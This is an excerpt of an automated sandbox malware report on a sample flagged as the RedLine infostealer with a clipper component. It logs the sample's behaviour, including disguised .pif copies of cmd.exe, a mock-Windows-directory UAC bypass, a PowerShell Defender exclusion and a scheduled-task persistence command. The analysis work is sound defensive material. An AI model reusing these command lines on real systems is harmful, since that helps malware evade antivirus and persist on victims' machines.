                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EED660
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00F03E66
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE6E57
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE7A34
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EEEE03
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF0BF0
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF0740
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE6B20
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004028B0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00418244
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004193C4
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0044E3F6
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00402B90
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004073A0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00408C60
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0040DC11
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00407C3F
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00418CCC
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00406CA0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0041A4BE
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00401650
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00402F20
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00418788
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00402F89
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_05AB0960
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_05AB6840
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_05AB12DC
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_007000D9
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C51EE
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_007039A3
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006F5980
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C6EAF
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C7B71
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006FD580
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006FC7F0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C7F80
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006F3780
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_02AC1020
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_02AC1030
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_064317F8
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0643A500
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_06430F28
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_06430BE0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0643D9B0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_064337E7
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_064337F8
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_06DC31C3
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE74B1
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4875
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE540A
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE4C10
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00F04191
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE9144
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0695A
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4EC1
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF3EB3
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF5A86
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0769E
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EED660
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00F03E66
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE6E57
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE7A34
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EEEE03
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF0BF0
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF0740
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE6B20
                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Load Driver
                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Security
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: String function: 0040E1D8 appears 42 times
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02CF44DC appears 74 times
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02CF46D4 appears 244 times
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02D0894C appears 56 times
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02CF4500 appears 33 times
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02CF4860 appears 949 times
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02D089D0 appears 45 times
                    Source: elevation_service.exe.13.dr Static PE information: Number of sections: 12 > 10
                    Source: elevation_service.exe0.13.dr Static PE information: Number of sections: 12 > 10
                    Source: C6dAUcOA6M.exe Binary or memory string: OriginalFilename vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.00000000209D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1540095281.0000000021EA2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A54000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B53000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B03000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021B3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1576898183.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1453650948.00000000023A5000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
                    Source: unknown Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                    Source: C6dAUcOA6M.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 13.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 40.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 32.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 13.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 32.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: armsvc.exe.11.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: alg.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: AppVClient.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: DiagnosticsHub.StandardCollector.Service.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: FXSSVC.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: elevation_service.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: elevation_service.exe0.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, cPs8D.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 72CF8egH.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, G5CXsdn.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 3uPsILA6U.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 6oQOw74dfIt.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, aMIWm.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 3QjbQ514BDx.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: classification engine | Classification label: mal100.spre.troj.spyw.evad.winEXE@59/159@135/22
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Code function: 0_2_02CF7FD4 GetDiskFreeSpaceA, 0_2_02CF7FD4
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 13_2_004019F0
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Code function: 0_2_02D06DC8 CoCreateInstance, 0_2_02D06DC8
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_006ECBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 13_2_006ECBD0
                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | File created: C:\Users\Public\Libraries\PNO
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-605af54964cdb3b4-inf
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Mutant created: NULL
                    Source: C:\Windows\System32\alg.exe | Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-605af54964cdb3b49ea72c54-b
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-605af54964cdb3b4cd68e75b-b
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | File created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Command line argument: 08A 13_2_00413780
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C6dAUcOA6M.exe | ReversingLabs: Detection: 63%
                    Source: C6dAUcOA6M.exe | Virustotal: Detection: 62%
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | File read: C:\Users\user\Desktop\C6dAUcOA6M.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | Evasive API call chain: __getmainargs,DecisionNodes,exit graph_11-383
                    Source: unknown | Process created: C:\Users\user\Desktop\C6dAUcOA6M.exe "C:\Users\user\Desktop\C6dAUcOA6M.exe"
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\C6dAUcOA6M.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
                    Source: C:\Windows\SysWOW64\esentutl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: C:\Users\Public\alpha.pif | Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknown | Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                    Source: unknown | Process created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                    Source: unknown | Process created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: unknown | Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section loaded: url.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section loaded: ieframe.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section loaded: netapi32.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section loaded: wkscli.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section loaded: ??.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section loaded: ???????.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
